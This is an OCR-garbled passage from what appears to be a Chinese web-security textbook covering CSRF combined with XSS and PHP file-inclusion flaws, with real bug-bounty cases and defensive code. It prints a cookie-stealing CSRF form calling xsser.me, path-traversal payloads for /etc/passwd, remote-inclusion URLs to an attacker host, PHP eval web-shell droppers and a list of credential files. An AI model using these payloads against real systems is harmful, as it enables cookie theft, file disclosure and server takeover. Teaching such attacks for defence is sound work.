252.2.252.2.252.2.255&Save=%C8%B7+%B6%A8></img> 
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2. XSS+CSRF= 蠕 虫 病毒 案例 

大 部 分 情况 下 ，CSRF 会 被 开发 者 所 忽略 ， 并 不 觉得 是 一 个 漏洞 ， 而 某 些 情况 下 ，CSRF 
结合 XSS 却 可 以 造成 大 问题 。 

2013 年 5 月 ， 和 白 帽 子 “VIP” 提 交 了 两 处 漏洞 : XSS + CSRF。 


首先 来 看 第 一 个 XSS 漏洞 ， 在 图 2-38 中 可 以 看 到 ， 图 虫 网 相册 处 的 相册 名 称 未 进行 转 
义 ， 因 此 可 造成 存储 型 XSS， 从 而 盗 取 用 户 Cookies。 


名 称 ; 
|><sappaertbssD)<srpe 











图 2-38 ”相册 名 称 未 进行 转 义 


第 二 处 则 是 CSRF 漏洞 ， 在 图 虫 网 创建 相册 的 位 置 没有 token， 因 此 可 以 利用 此 CSRF 
漏洞 以 用 户 身份 创建 账户 ， 如 图 2-39 所 示 。 


创建 新 相册 

















图 2-39 创建 相册 的 位 置 没有 token 
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这 两 个 漏洞 单 看 似乎 觉得 很 “鸡肋 ”， 但 是 结合 起 来 就 会 产生 不 良 效果 。 

(1) 利用 CSRF 漏洞 以 用 户 的 身份 创建 有 XSS 脚本 的 相册 (并 且 可 以 以 用 户 身份 再 发 
布 一 条 图 博 使 蜂 虫 进一步 扩大 ) ， 而 相册 名 称 又 会 在 首页 显示 。 

(2) 这 样 每 次 当 受 害 用 户 访问 首页 时 ，XSS 代码 就 会 被 执行 一 次 ， 用 户 修改 密码 也 没 
用 ， 只 要 一 访问 首页 ， 新 鲜 的 Cookies 就 将 被 送 到 。 

(3) 流程 如 图 2-40 所 示 。 





每 当 用 户 访问 首页 
时 午 会 锅 发 xss 只 






图 2-40 CSRF 漏洞 的 流程 


攻击 者 利用 的 代码 如 下 : 


<html> 
<body> 
<form name="csrf" action="http://tuchong.com/api/album/create/" method="POST"> 
<input type=text name=type value="album"></input> 
<input type=text name=title value="=%22%3E%3Cscript+ 
src%3Dhttp%3 A%2F%2Fxsser.me% 
2FFNBnOV%3E%3C%2Fscript%3E"></input> 
<input type="submit" value="submit"/> 
</form> 
<script> 
document.csrf.submit(): 
</script> 
</body> 
</html> 


从 代码 中 可 以 看 出 , 攻击 者 构造 了 一 个 表单 ,在 表单 的 title 输入 框 中 插入 了 一 段 恶 意 代 
码 ， 并 且 表单 加 载 完成 后 会 自动 提交 ， 由 于 后 端 没 有 针对 CSRF 漏洞 做 限制 ， 因 此 用 户 在 毫 
不 知情 的 情况 下 便 创建 了 一 个 带 有 恶意 代码 的 相册 。 
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提交 数据 之 后 ， 返 回 下 面 所 示 的 结果 


{album”: (“alb_id”:”312321”, “type”:“album’”, “omer_id”:”333278”, “created”: “2013-05-08 19: 19: 14”, “updated”:“2013-05-0: 
19:19:14”, “deleted by”:”0”, “alb_imagecount’”:°0”, “lb_bromsecount”:”0”, “alb_commentcount”:”0”, “cover_id”: 0”, “title”: ”=%22%3R| 














每 次 都 会 向 xsser.me 发 送 Cookies， 如 图 2-41 所 示 。 





| 
发 单 张 发 组 照 发 文字 0 0 0 
关注 关注 者 “| 小 组 
原创 和 推荐 
我 的 评论 
我 的 分 享 
我 的 相册 (3) 











> 








SI copatead Tehor nherite 


vstyles 十 深 亲 - 
elemwent .style { 









| Msourees Or se Tinie rsle Ga EF 


vea href="http: //tuchong. com/333278/albuns/312322/"> 
vpn 全 











cseript stc="http://nsser. me/FNBnOV™>|/script> 





图 2-41 向 xsser.me 发 送 Cookies 


XSS 发 送 后 ， 可 以 看 到 插件 中 已 经 提示 拿 到 了 Cookie 值 ， 如 图 2-42 所 示 。 


截获 新 cookie 


http:iAtuchong.com/ 


图 2-42 ”提示 拿 到 了 Cookie 





从 这 个 漏洞 案例 中 可 以 看 出 ， 要 修复 此 漏洞 非常 简单 ， 只 需 
(1) CSRF 方面 ， 增 加 token 验证 。 
(2) XSS 方面 ， 转 义 编码 。 


2.4.3 ”操作 实践 
通常 CSRF 会 伴随 着 XSS 作 为 攻击 手段 ， 下 面 用 前 面 提 到 的 XSS 漏 洞 配合 做 这 一 次 实践 。 
如 图 2-43 所 示 , 在 标题 位 置 提交 一 个 img 标 签 , 其 中 src 属 性 值 的 地 址 是 退出 登录 的 地 址 。 
当 提 交 后 ， 其 他 人 只 要 看 到 这 个 帖子 标题 ， 就 会 做 退出 操作 ， 而 这 个 操作 并 不 是 用 户 自 
己 本 身 想 做 的 。 如 图 2-44 所 示 ， 当 用 户 再 次 打开 这 个 页 面 时 ， 发 现 已 经 需要 重新 登录 。 
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Permeate 8 


慰 题 | CSRF 漏 洞 演示 </a> <img src="httpV/permeateJocalhosVhomeyindexphp?m=useraa=logout /> <a> 





















图 2-43 在 发 帖 处 提交 XSS 代码 


Permeate 4 区 [=] 


帖子 标题 作者 回复 /查看 最 后 发 表 

测试 发 帖 一 下 子 哈哈 哈 admin a 2017-07-13 15:53:14 

test admin 0 2017-08-11 14:0907 
CSRF 油 洞 演示 坊 admin o 2017-08-12 08:29:16 
首页 上 -页 下 -页 ， 尾 页 总 共 { 页 本 页 3 络 总 共 3 条 








图 2-44 XSS 代码 执行 后 ， 已 经 退出 登录 
2.4.4 ”防御 方法 


CSRF 攻 击 之 所 以 能 够 成 功 ， 是 因为 攻击 者 可 以 伪造 用 户 的 请 求 ， 该 请 求 中 所 有 的 用 户 
验证 信息 都 存在 于 Cookie 中 , 因此 攻击 者 可 以 在 不 知道 这 些 验 证 信息 的 情况 下 直接 利用 用 户 
自己 的 Cookie 来 通过 安全 验证 。 由 此 可 知 ， 抵 御 CSRF 攻 击 的 关键 在 于 ， 在 请 求 中 放 入 攻击 
者 所 不 能 伪造 的 信息 ， 并 且 该 信息 不 存在 于 Cookie 中 。 


1. token 验证 


开发 者 可 以 在 HTTP 请 求 中 以 参数 的 形式 加 入 一 个 随机 产生 的 token， 并 在 服务 器 端 建立 
一 个 拦截 器 来 验证 这 个 token， 如 果 请 求 中 没有 token 或 者 token 内 容 不 正确 ， 就 认为 可 能 是 
CSRF 攻 击 而 拒绝 该 请 求 。 
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每 次 用 户 访问 了 页 面 的 时 候 ， 生 成 一 个 不 可 预测 的 token 存 放 在 服务 器 Session 中 ， 另 外 
一 份 放 在 页 面 中 , 提交 表单 的 时 候 需 要 把 这 个 token 带 过 去 , 接收 表单 的 时 候 先 验证 一 下 token 
是 否 合法 。 

正常 访问 时 ， 客 户 端 浏览 器 能 够 正确 得 到 并 传 回 这 个 伪 随 机 数 ， 而 通过 CSRF 传 来 的 欺 
骗 性 攻击 中 ， 攻 击 者 不 能 事先 得 知 这 个 伪 随 机 数 的 值 ， 服 务 器 端 会 因为 校 验 token 的 值 为 空 
或 者 错误 拒绝 这 个 可 疑 请 求 。 


2. Referer 信息 验证 








大 多 数 情况 下 ， 浏 览 器 访问 一 个 地 址 ， 其 中 Header 头 里 面 会 包含 Referer 信 息 ， 里 面 存储 
了 请 求 是 从 哪里 发 起 的 。 

9 如 果 HTTP 头 里 包含 Referer， 就 可 以 区 分 请 求 是 同 域 下 还 是 跨 站 发 起 的 ， 所 以 也 可 
以 通过 判断 有 问题 的 请 求 是 否 是 同 域 下 发 起 的 来 防御 CSRF 攻击 。 

多 ”Referer 验证 的 时 候 有 几 点 需要 注意 ， 如 果 判 断 遇 辑 为 Referer 中 是 否 包含 xxx.com 
字符 串 ， 那 么 在 网 站 子 域名 可 以 被 攻击 者 控制 的 情况 下 ， 会 存在 被 攻击 者 绕 过 的 可 
能 ; 另外 ， 攻 击 者 也 可 以 在 其 网 站 目录 中 建立 一 个 xxx.com 文件 夹 ， 这 样 Referer 
也 会 存在 xxx.com 字符 串 ， 所 以 同样 存在 绕 过 的 可 能 ， 正 确 的 判断 应 该 是 直接 判断 
Referer 的 域名 是 否 等 于 当前 域名 。 





3. 图 片 验证 码 


图 片 验 证 码 想 必 大 家 都 知道 可 以 用 来 做 人 机 验证 , 其 实在 一 些 重要 的 操作 中 , 也 可 以 起 
到 防范 CSRF 的 作用 ， 但 是 如 果 滥 用 对 用 户 体验 并 不 好 ， 所 以 并 不 是 首选 方法 ， 综 合 来 看 ， 
token 是 最 好 的 CSRF 防 范 手段 。 


2.4.5 ”防御 代码 示例 
1. 生成 令 牌 


对 任何 表单 的 提交 。 所 以 在 服务 端 保存 token 值 的 时 候 不 应 该 直接 覆盖 ， 而 是 用 数组 保存 。 
如 果 只 是 简单 覆盖 了 以 前 的 token， 可 能 会 影响 用 户 同 时 打开 两 个 表单 的 体验 ， 因 此 生成 的 
token 值 应 该 存放 在 数组 中 ， 这 样 可 以 避免 多 个 token 值 之 间 互 相 覆 盖 。 代 码 如 下 : 


<?php 
function gen_stoken() 








// 生 成 TOKEN 
$pToken = mds(uniqid(rand0, true).'daxia"); 
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// 存 放 到 SESSION， 用 数组 保存 ， 可 以 存放 多 个 值 
$_SESSION['daxia'"][$pToken] = true; 


S$this->assign('token',$pToken); 
2. Web 表单 


在 模板 页 面 中 ， 需 要 把 控制 器 中 分 配 过 来 的 数据 放 入 表单 ， 当 提交 表单 时 ， 该 token 也 
会 被 用 于 验证 请 求 的 合法 性 。 
<2php 
session start(); 
?> 
<form method="POST" action="transfer.php"> 
<input type="text" name="toBankld"> 
<input type="text" name="money"> 
<!-- 把 TOKEN 值 放 到 表单 当中 --> 
<inputtype = hidden' name = 'daxia' value='{{$token}}'> 
<input type="submit" name="submit" value="Submit"> 
</form> 


3. 服务 端 核对 令 牌 


服务 端 在 接收 到 用 户 的 请 求 后 ， 首 先 验证 token 是 否 有 效 ， 如 果 有 效 就 通过 ， 并 且 在 
Session 中 删除 当前 的 token 值 ， 避 免 被 反复 利用 。 


<?php 
session start(); 
// 验 证 提交 的 数据 是 否 经 过 授权 
iflisset($ SESSION['daxia'][$_POST["daxia]])) { 
/验证 通过 ， 让 令 牌 失效 
unset($_ SESSION["daxia'][$_ POST['daxia']]); 
} else { 
/验证 不 通过 
return false; 





} 
2.4.6 小 结 
CSRF 漏 洞 在 网 站 不 存在 XSS 的 时 候 危 害 并 不 明显 ， 因 此 很 多 开发 者 往往 不 太 重视 此 漏 


洞 所 带 来 的 安全 隐患 。 但 CSRF 不 是 单独 使 用 的 ， 攻 击 者 往往 是 把 XSS 漏 洞 和 CSRF 漏 洞 组 合 
起 来 使 用 ， 这 样 如 果 攻 击 者 获得 了 很 大 权限 ， 对 于 网 站 运营 者 来 说 就 是 很 大 的 灾难 了 。 
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开发 者 都 希望 代码 更 加 灵活 ， 所 以 很 多 时 候 会 将 被 包含 的 文件 设置 为 变量 , 用 来 进行 动 
态 调 用 ， 但 正 是 由 于 这 种 灵活 性 ， 导 致 客户 端 可 以 调用 一 个 恶意 文件 ， 造 成 文件 包含 漏洞 。 
文件 包含 漏洞 在 PHP Web 应 用 中 居多 ， 而 在 JSP、ASP、ASP.NET 程 序 中 却 非常 少 ， 甚 至 没 
有 包含 漏洞 的 存在 。 

文件 包含 漏洞 产生 的 原因 是 在 引入 文件 时 , 由 于 传 入 的 文件 名 没有 经 过 合理 的 校 验 或 者 
校 检 被 绕 过 ， 从 而 操作 了 预想 之 外 的 文件 ， 因 此 导致 意外 的 文件 泄露 甚至 恶意 的 代码 注入 。 
当 被 包含 的 文件 在 服务 器 本 地 时 ， 就 会 形成 本 地 文件 包含 漏洞 。 
2.5.1 漏洞 成 因 

PHP 常 见 的 导致 文件 包含 漏洞 的 函数 如 下 : 

include(),include_once(),require(),require_once(),fopen(),readfile() 

当 使 用 前 4 个 函数 包含 一 个 新 的 文件 时 ， 只 要 文件 内 容 符合 PHP 语 法 规范 ， 任 何 扩展 名 
都 可 以 被 PHP 解 析 ， 当 包含 非 PHP 语 法 规范 源 文件 时 ， 将 会 暴露 其 源 代码 。 后 两 个 函数 则 会 
造成 敏感 文件 被 读 取 。 

要 想 成 功利 用 文件 包含 漏洞 ， 需 要 满足 下 面 两 个 条 件 : 

(1) include() 等 函数 通过 动态 变量 的 方式 引入 需要 包含 的 文件 。 

(2) 攻击 者 能 够 控制 该 动态 变量 。 

文件 包含 漏洞 分 为 两 种 类 型 : 本 地 文件 包含 和 远程 文件 包含 。 两 种 文件 包含 漏洞 的 检测 
方法 和 防御 方法 各 不 相同 ， 本 地 文件 包含 漏洞 是 加 载 服务 器 本 地 的 文件 , 远程 文件 包含 漏洞 
是 加 载 一 个 远程 的 资源 ， 比 如 通过 HTTP 协 议 加 载 一 个 远程 文件 。 
2.5.2 ”本 地 文件 包含 

1. 本 地 文件 包含 示例 

代码 示例 : 


<2php 

$file=$ GET[file']; 

让 (file_exists(/home/wwwrun' . $file . .php)) { 
include /home/wwwrun' . $file . .php'; 
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假设 访问 对 应 的 URL 是 http://www.localhost.test/test.php?file=， 当 攻击 者 提交 参数 的 file 
值 为 “../../etc/passwd” 时 ， 这 段 代码 相当 于 include /home/wwwrun/../../etc/passwd.php'"， 这 个 
文件 显然 是 不 存在 的 ， 不 过 攻击 者 会 想到 使 用 字符 串 截 断 的 办 法 来 绕 过 。 

PHP 内 核 是 由 C 语 言 实现 的 ， 所 以 使 用 了 C 语 言 中 的 一 些 字符 串 处 理 函 数 。 比 如 在 连接 
字符 串 时 ，0 字 节 (\x00〉 将 作为 字符 串 结束 符 。 所 以 在 这 个 地 方 ， 攻 击 者 只 要 在 最 后 加 入 
-个 0 字 节 ， 就 能 截断 file 变 量 之 后 的 字符 串 ， 即 参数 为 “../../etc/passwd\0”， 而 浏览 器 URL 
并 不 支持 “\”， 因 此 通过 浏览 器 访问 的 时 候 需 要 通过 urlencode 进 行 编码 ， 变 成 
®../../etc/passwd%00”。 

从 上 面 的 代码 示例 中 可 以 看 到 ， 路 径 在 
“/home/wwwrun” 下 ， 攻 击 者 是 否 只 能 加 载 该 目录 下 的 
子 目 录 文 件 呢 ? 答案 显然 是 否定 的 ， 比 如 上 面 的 例子 中 
使 用 “.././” 的 方式 来 跳出 当前 文件 夹 ， 从 图 2-45 中 可 以 
看 出 ,即使 前 面 有 路 径 , 依然 可 以 跳出 前 面部 分 的 路 径 。 

通过 “.././” 跳 出 目录 通常 可 以 用 来 作为 目录 遍历 的 方法 。 

2. 本 地 文件 任意 读 取 案 例 


2015 年 6 月 ， 和 白 帽 子 “ 昔 茜 公 主 ” 提 交 漏 洞 “ 某 站 存在 任意 本 地 文件 读 取 漏 洞 ”， 一 
处 本 地 文件 包含 漏洞 。 

缺陷 编号 : wooyun-2015-0117661 。 

白 帽子 在 进入 此 系统 官方 网 站 首页 的 时 候 ， 发 现 有 一 处 图 片 URL 地 址 为 : 

http://www.localhost.com/getImage.html?fileUrl=/usr/local/app/upload/images&fileName= 
wkt_20150320093831932.png 


在 源 代码 中 发 现 的 可 疑 URL 截图 如 图 2-46 所 示 。 














图 2-45 跳出 前 面 的 路 径 
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图 2-46 ”可疑 URL 截图 
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这 个 URL 包含 两 个 参数 ， 其 中 fileUrl 的 值 可 以 推断 出 是 一 个 Linux 系统 的 路 径 ， 而 
fileName 可 以 猜测 出 是 一 个 文件 名 ， 因 此 白 帽子 更 改 了 URL 参数 ， 构 造 出 下 面 的 URL: 

http://www.localhost.com/getImage.html?fileUrl=/etc&fileName=hosts 

通过 浏览 器 访问 此 URL， 发 现 确实 能 访问 到 ( 见 图 2-47) ， 因 此 可 以 确定 此 漏洞 是 真 
实 存在 的 。 


[入 
[ 志 仿 珀 http://Wwww.guolian-life.com/getimage html?fleUr=/etcafileName=hosts DP-BcCx 


文件 (F) 。 编 句 (E) 。 坦 看 (V) 收藏 闪 (A) 工具 (T) 帮助 (H) 





3 Do not renove the folloving line, or various prograas 
3 that require netyork functionality will fail， 

127,.0, 0. 1 wxdc-sc-8s-app01 localhost 

:: localhost6. localdonain6 localhost6 





图 2-47 访问 到 的 URL 


接 下 来 ， 白 帽子 再 次 验证 是 否 可 以 读 取 到 敏感 文件 /etc/passwd， 于 是 构造 了 如 下 URL， 
访问 后 发 现 确 实 能 访问 到 ， 如 图 2-48 所 示 。 
http://www.localhost.com/getImage.html?fileUrl=/etc&fileName=passwd 











I | 
ba 总 ww guolian-life.com/getlmage html)fleUrl=yetc& sswd 有 -有 


his 过- 
文件 (F) 坟 铝 (E) 下 看 (V) ”有 夫 (A) 工具 (T) 帮助 (H) 


root :sO:root 

























n/nologin 
ybin/shutdowm 
sbin/nologin 


1 sbin/nologin 
n/nologin 
bin/nologin 
sbin/nologin 

bin/nologin 


nologi 
5 1 ow :/dev:/sbin/nologin 





图 2-48 访问 到 的 URL 


3. 文件 包含 漏洞 案例 


2015 年 9 月 , 白 帽 子 “ 管 管 侠 ” 提 交 漏洞 “ 某 站 点 任意 文件 包含 漏洞 一 枚 (/etc/passwd)”， 
该 漏洞 是 一 处 本 地 文件 包含 。 

缺陷 编号 : wooyun-2015-0121278。 

和 白 帽 子 在 该 网 站 中 发 现 一 处 URL 疑似 Linux 的 文件 路 径 ， 于 是 使 用 “.././” 的 方式 跳跃 
到 根 目录 ， 然 后 拼凑 “/etc/passwd” 文 件 名 ， 再 加 上 字符 截断 “%00”， 构 造 出 如 下 URL: 
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http://wan.localhost.com/bbs/plugin.php?action: ./etc/passwd%00&id=dc_ mall 
&inajax=1，URL 构造 好 之 后 ， 到 浏览 器 中 访问 ,发 现 passwd 的 内 容 已 经 被 输出 ， 如 图 2-49 
所 示 。 
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图 2-49 被 输出 的 passwd 


2.5.3 ”远程 文件 包含 

1. 漏洞 本 地 验证 

如 果 PHP 的 配置 选项 allow_url_include 为 ON， 那 么 include/require 函 数 是 可 以 加 载 远程 文 
件 的 ， 这 种 漏洞 被 称 为 远程 文件 包含 漏洞 。 

以 下 面 的 代码 为 例 : 


<2php 
require_once $basePath . ‘/action/m share.php'; 


假设 上 面 的 代码 对 应 的 URL 为 http:/www.localhost.test/test.php， 攻 击 者 可 以 构造 URL 
“http://www.localhost.test/?param=http://attacker/phpshell.txt?”， 当 服务 器 接收 到 请 求 之 后 ， 
通过 require_one 加 载 的 URL 变 成 了 : 
require_once 'http://attacker/phpshell.txt?/action/m_share.php’ 
问号 后 面 的 路 径 此 时 已 经 被 解释 成 URL 的 参数 ,这 也 是 一 种 “截断 ”的 方式 , 这 是 攻击 
者 在 利用 远程 文件 包含 漏洞 时 所 用 到 的 。 同 样 地 , 远程 文件 包含 也 可 以 用 %00 作 为 截断 符号 。 
远程 文件 案例 


2015 年 7 月 , 白 帽 子 “ 凌 零 1 提交 “机 锋 网 主 站 远程 文件 包含 漏洞 (任意 代码 执行 )”， 
这 是 一 个 远程 文件 包含 的 漏洞 。 
缺陷 编号 : wooyun-2015-0126273 。 


白 帽 子 在 论坛 网 站 发 现 有 一 处 URL 参数 包含 另 一 个 URL 地 址 , 于 是 好 奇 是 否 能 更 改 参 
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数 中 的 URL 地 址 ， 将 其 更 改 为 自己 服务 器 的 地 址 ， 于 是 构造 出 新 的 一 个 URL 地 址 : 
http://www.localhost.com/plus/imageurl.php?p=http://www.localhost.com/webadmin/upload/ 
pic_seckill/info.php%3f%2500.jpg， 在 浏览 器 中 访问 新 的 URL 地 址 ， 可 以 看 到 白 帽子 的 代码 
已 经 被 运行 ， 如 图 2-50 所 可 
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图 2-50 运行 了 白 帽 子 的 代码 


3. 远程 文件 包含 案例 


2015 年 6 月 , 白 帽 子 “range ”提交 漏洞 “ 某 系 统 多 处 远程 文件 包含 执行 任意 命令 导致 
getshell (内 有 大 量 主机 账号 及 财务 快报 ) ”。 


缺陷 编号 : 
此 厂商 是 一 


wooyun-2015-0121394。 
家 主机 提供 商 ,提供 主机 以 及 虚拟 空间 服务 ， 上面 存放 了 大 量 网 站 , 白 帽子 


在 网 站 的 某 一 个 页 面 中 发 现 一 处 可 疑 URL， 于 是 构造 了 远程 文件 加 载 的 URL 地 址 : 
http://hy.localhost.cn/store/content.php?module=http%3A%2F%2Frangetool.wc.lt%02F 1 .txt%3F 。 
白 帽 子 通过 浏览 器 访问 其 构造 的 URL， 可 以 看 到 phpinfo 信息 已 经 显示 出 来 ， 如 图 2-51 所 示 。 
在 验证 了 漏洞 确实 存在 后 ， 白 帽子 在 服务 器 中 写 入 一 个 PHP 木马 ， 并 通过 此 木马 获取 
了 网 站 权限 ， 木 马 文件 的 访问 地 址 为 http:/hy.localhostcn/store/l.php。 当 白 帽 子 打开 此 URL 


地 址 时 ， 
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发 现 了 服务 器 的 大 量 日 志文 件 ， 如 图 2-52 所 示 。 
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图 2-51 显示 的 phpinfo 信息 





gaj_wzxLexport_output_29156339_155746.txt 


gaj_wzoLexport_output_29156317_112291.txt 


gaj_wzxtLexport_output_29158331_154648 txt 





JsmoLexport_outpat_29158487_155242_txt 





cexport_output_29158415_125898 txt 


gaj_wzoLexport_output_29156429_196237_txt 


gaj_wzoLexport_output 





31505984_159397_txt 








0aj_wzxoLexport_output_20150511_142959 txt 
gaj_wzoLexport_output_29159518_132549 .txt 


gaj_szot_export_output 





158685_115481 txt 


本 。 0aj_wzot_export_output_28156619_135914 bxt 


icp_bac_export_29149419-158345. txt 


‘cp_barx_export_20140410-154634. txt 








tcp_baxx_export_20140410-154723. txt 





图 2-52 服务 器 中 的 日 志文 件 
通过 获取 文件 内 容 发 现 大 量 备案 信息 ， 如 图 2-53 所 示 。 
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编号 互联 网 歼 据 中 心 > 虚报 空间 租 亿 服 务 单位 编码 机 房 地 址 。 送 入 网 洛 服务 高 将 到 ”单位 (个 人 ) 名称 。 用 户 性 原 

竟 位 组 织 机 构 代 玛 。 单位 (个 人 》. 地 址 ” 关 位 5 个 人 ) 联系 申 适 。 服务 类 型 ” 网 站 名 称 ” 网 址 域名 ”域名 注册 服务 南 

起 始 IP 地 址 结束 IP 地 址 经营 性 质 。 接 入 方式 。 公 玄 机 关 备 塞 号 工信部 许 到 备案 号 码 ”网 站 开通 日 期 

eh 门 代码 二 主办 人 证 件 类 型 主办 人 证 件 号 码 应急 联 系 人 姓名 证 件 类 型 。 证 住 号 码 
黎 动 下 电 王 凯 










126155 75604124 
内 蒙古 自演 区 虽 
hhhrwd .cog 

990 150»%0800 


北京 市 毒 演 区 万 泉 河 路 紫 全 庄园 10 号 核 ] 恒 ”人 


110104000d| 


让 河 路 繁 全 庄园 10 号 机 T56041849 
8 东 丽 区 光世 






ra 2 ”天津 市 东明 区 华 明 大 道 10| 
中 心 。 Shayy.5R 115.47.17 5.47-17.116 1 03 
990 69772105 > 赵 岳 


086-022-84900025 2c1869802807~ 


126157 756041849 
内 蒙古 自治 区 地 请 国 77 212: 
1 03 号 -车 -53002332 号 -1 2015-05-29 110000000000 
086-0475-6272167 。 13847502720 蕊 21jeag.com 


?5sHn41849 天 全 拓 人 尼 代 不 术 全 入 芭 旨 民企 宁 从 A 室 0 011659| 
180.86.137.201 3 
0 990 VW Ei. < -191 2 











图 2-53 ”获取 的 文件 备案 信息 


2.5.4 测试 方法 
1. 读 取 敏感 文件 
假设 URL: http://www.test.localhost/index.php?Path=$path 的 path 存 在 本 地 文件 包含 漏洞 ， 


可 以 在 访问 参数 中 修改 path 参 数值 为 “/etc/path”， 如 果 文 件 的 内 容 被 返回 ， 就 代表 该 参数 存 
在 此 漏洞 。 
远程 包含 Shell 

如 果 目 标 主机 allow_url_fopen 选 项 是 激活 的 ， 就 可 以 尝试 远程 包含 木马 ， 比 如 在 自己 所 
在 的 服务 器 存放 一 个 shell 文 件 : http://www.localhost.test/echo.php， 代 码 如 下 : 

<?php fputs(fopen("shell.php", "w"), "<2php eval(\$_ POST[xxser]);?>"); 

然后 在 可 能 存在 此 漏洞 的 URL 中 修改 path 值 ， 得 到 构造 好 的 URL : 
http://www.localhost.test/index.php?path=http://www.localhost.com/echo.txt， 如 果 确 实 存 在 漏 
洞 ， 目 标 服 务 器 将 会 在 index.php 所 在 的 目录 下 生成 shell.php， 内 容 为 : 

<2php eval($_POST[xxser]); 


3. 本 地 包含 获取 shell 的 方法 


在 网 站 存在 本 地 文件 包含 漏洞 的 情况 下 ,攻击 者 并 不 一 定 能 拿 到 shell 权 限 ,但 攻击 者 会 
想 出 一 些 办 法 上 传 一 个 shell 文 件 ， 如 果 此 时 应 用 中 有 图 片上 传 功能 并 能 以 此 上 传 一 个 图 片 木 
马 ， 攻 击 者 是 最 为 激动 的 。 

假设 现在 已 经 上 传 一 句 话 图 片 木马 到 服务 器 ， 图 片 木马 代码 如 下 : 

<?php fputs(fopen("shell.php", "w"), "<?php eval(\$_ POST[xxser]);?>"); 
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并 知道 图 片 的 URL: http://www.localhost.test/uploadfile/xxx.jpg， 此 时 攻击 者 将 构造 一 个 
新 的 URL: http://www .test.localhost/index.php?path=./uploadfile/xxx.jpg, 当 访 问 此 URL 时 , PHP 
会 include 这 张 图 片 , 而 图 片 中 带 有 木马 代码 ， 所 以 会 在 index.php 所 在 的 目录 下 生成 shell.php， 
此 时 攻击 者 已 经 拿 到 了 shell。 


2.5.5 ”使 用 PHP 封装 协议 

1. 使 用 封装 协议 读 取 PHP 文件 

php:Wfilter 是 一 种 元 封装 器 ， 它 能 对 数据 流 进行 过 滤 及 筛选 ， 可 以 参见 http:/php.net/ 
manual/zh/book.filter.php ， 假 设 攻击 者 在 你 的 服务 器 中 上 传 了 一 个 木马 ， 带 有 木马 特性 的 文 
件 很 有 可 能 被 管理 员 察觉 到 ,因此 攻击 者 会 把 他 的 木马 文件 进行 编码 ， 使 管理 员 无 法 辨认 此 
文件 是 否 为 木马 ， 然 后 通过 php://filter 的 特性 在 访问 的 时 候 进行 解码 来 运行 ， 这 样 木马 就 非 
常 隐 蔽 了 。 

假设 文件 ndex.php 的 代码 如 下 : 


<?php 
include($_GET['a]); 
?> 





文件 config.php 的 代码 如 下 : 
PD9waHAgZWNobyAxMiM71D8+ 


按照 常理 来 说 ， 既 使 攻击 者 构造 了 下 面 的 URL 地 址 ， 也 是 无 法 执行 config.php 中 的 代码 
的 ， 因 为 config.php 中 的 代码 是 Base64 编 码 后 的 字符 串 。 

http://www .test.localhost/index.php?a=config.php 

不 过 攻击 者 可 以 利用 php://filter 的 特性 构造 下 方 的 URL 地 址 来 加 以 利用 : 

http://www .test.localhost/index.php?page=php://filter/read=convert.base64-encode/resource= 
config.php 

此 URL 地 址 运行 后 , 服务 器 会 先 获取 经 过 Base64 加 密 后 的 字符 串 , 之 后 再 由 Base64 解 密 ， 
然后 运行 。 

这 个 字符 串 在 编码 前 其 实 是 一 段 可 以 运行 的 PHP 源 代码 , 解密 后 就 可 以 得 到 木马 原本 的 

“ 样 狐 ”。 


<2php echo 123; ?> /Base64 编码 前 
PD9waHAgZWNobyAxMjM7ID8+ ”//Base64 编码 后 
下 面 写 入 PHP 文 件 。 
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在 allow_url include 为 On 时 ， 构 造 URL : http:/www.test.localhost/index.php?page= 
php:Winput， 并 且 提 交 数 据 为 : 

<2php system('net user); ?> 
会 得 到 net user 命 令 的 结果 。 

2. 截断 包含 


代码 示例 如 下 : 


<2php 

if (isset($ GET['page'])) { 

include$_ GET['page] . ".php"; 

} else { 

include 'home.php'; 

} 

在 上 述 代 码 示例 中 , 虽然 开发 者 限定 了 文件 后 缀 名 ,不 过 在 实际 中 ,攻击 者 可 以 通过 路 
径 截 断 来 绕 过 此 限制 。 假 设 限制 服务 器 中 存在 一 个 图 片 木马 ,文件 名 为 1.jpg， 攻击 者 可 以 构 
造 URL 地 址 : http://www.test.localhost/index.php?page=1.jpg%00, 当 拼 接 的 路 径 为 1.jpg%00.php 
时 ，PHP 底 层 实 际 上 会 抛弃 %00 以 及 后 面 的 路 径 部 分 。 因 此 ， 服 务 器 实际 加 载 的 文件 变 成 了 
ljpg。 


2.5.6 小结 


(1) 严格 判断 包含 的 参数 是 否 外 部 可 控 ， 因 为 文件 包含 漏洞 利用 成 功 与 否 的 关键 点 就 
在 于 被 包含 的 文件 是 否 可 被 外 部 控制 。 

(2) 路 径 限 制 。 限 制 被 包含 的 文件 只 能 在 某 一 文件 夹 内 ， 一 定 要 禁止 目录 跳 转 字符 ， 
名 所 /2 

(3) 包含 文件 验证 。 验 证 被 包含 的 文件 是 否 是 白 名 单 中 的 一 员 。 

(4) 尽量 不 要 使 用 动态 包含 , 可 以 在 需要 包含 的 页 面 固定 写 好 ,如 include("head.php");。 

(5) 本 地 文件 包含 可 以 通过 配置 PHP 的 open_basedir 来 限制 ， 其 作用 是 限制 在 某 个 特定 
目录 下 PHP 能 打开 的 文件 。 (例如 open_basedir = /home/wwwrootwww.testlocalhost， 在 
Windows 下 多 个 目录 应 当 用 分 号 隔 开 ， 在 Linux 下 则 用 冒号 隔 开 。) 


(6) 请 注意 ,在 服务 器 Linux 系 统 中 ,攻击 者 经 常会 通过 扫描 工具 探测 下 面 的 一 些 文件 
目录 : 
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-htaccess 

/var/lib/locate.db 
/var/lib/mlocate/mlocate.db 
/var/log/apache/error.log 
/usr/local/apache2/conf/httpd.conf 
/root/.ssh/authorized_ keys 
/root/.ssh/id_rsa 
/root/.ssh/id_rsa.keystore 
/root/.ssh/id_rsa.pub 
/root/.ssh/known_hosts 
/etc/shadow 

/root/.bash_history 
/root/.mysql_history 
/proc/self/fd/fd[0-9]* (文件 标识 符 ) 
/proc/mounts 

/proc/config.gz 


在 运营 网 站 的 过 程 中 , 不 可 避免 地 要 对 网 站 的 某 些 页 面 或 者 内 容 进行 更 新 ， 比 如 用 户 需 
要 上 传 头像 、 发 帖 需要 上 传 附件 、 商 品 需要 上 传 照片 等 ， 这 时 便 需 要 使 用 网 站 的 文件 上 传 功 
能 。 如 果 不 对 被 上 传 的 文件 进行 限制 或 者 限制 被 绕 过 ， 该 功能 便 有 可 能 会 被 利用 于 上 传 可 执 
行文 件 、 脚 本 到 服务 器 上 ， 从 而 进一步 导致 服务 器 沦陷 。 

